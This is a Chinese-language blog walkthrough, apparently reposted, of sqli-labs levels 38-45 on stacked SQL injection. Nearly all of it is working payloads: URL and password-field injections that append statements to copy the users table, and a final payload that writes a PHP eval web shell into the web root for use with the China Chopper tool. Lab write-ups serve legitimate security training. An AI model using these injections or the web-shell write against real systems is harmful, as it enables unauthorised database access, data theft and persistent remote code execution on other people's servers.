sqli lab 38-45
Posted 幸运儿mnmnmn
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli lab 38-45相关的知识,希望对你有一定的参考价值。
less38
Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。
而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ;表示语句结束。
这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
我们可以在mysql命令行中进行测试:
Select * from users; create table test1 like users;
Show tables;
Select * from users; drop table test1;
Select * from users; select 1,2,3;
http://192.168.50.100/sqli-labs/Less-38/?id=1\'; create table ghz like users ;--+
http://192.168.50.100/sqli-labs/Less-38/?id=1\'; create table ghz like users ;--+
但其实这样只是复制了表的结构 美哟做到复制表的数据
参考链接 :https://blog.csdn.net/qi95719/article/details/60883148
http://192.168.50.100/sqli-labs/Less-38/?id=1\';create table ghz38 like users;insert into ghz38 select *from users; --+
less-39
id=1
一样的道理,只是闭合sql语句不同:
http://192.168.50.100/sqli-labs/Less-39/?id=1;create table ghz39 like users;insert into ghz39 select *from users; --+
less-40
id=(‘1’),并且错误不回显
一样的道理,只是闭合sql语句不同:
http://192.168.50.100/sqli-labs/Less-40/?id=1‘);create table ghz40 like users;insert into ghz40 select *from users; --+
less41
?id=1’ 并且没有回显信息 也没有错误提示 这就是和39关的区别
id=1,并且错误不回显
一样的道理,只是闭合sql语句不同:
http://192.168.50.100/sqli-labs/Less-41/?id=1;create table ghz41 like users;insert into ghz41 select *from users; --+
less42
42
a\';create table ghz42 like users;insert into ghz42 select *from users; #
less-43
与42关基本一样。区别在:id=(’1‘)
password构造语句:a\');create table ghz43 like users;insert into ghz43 select *from users; #
less-44
与42关基本一样。区别在:没有回显信息 id=’1‘
password构造语句:a\';create table ghz44 like users;insert into ghz44 select *from users; #
less-45
与42关基本一样。区别在:没有回显信息 id=(’1‘)
password构造语句:a\');create table ghz45 like users;insert into ghz45 select *from users; #
另一种方式 使用中国菜刀链接
a’;select \'<?php @eval($_POST[“ghz”]);?>\' into outfile ‘C:\\\\PhpStudy\\\\PHPTutorial\\\\WWW\\\\sqli-labs\\\\Less-42\\\\ghz42.php’ #
以上是关于sqli lab 38-45的主要内容,如果未能解决你的问题,请参考以下文章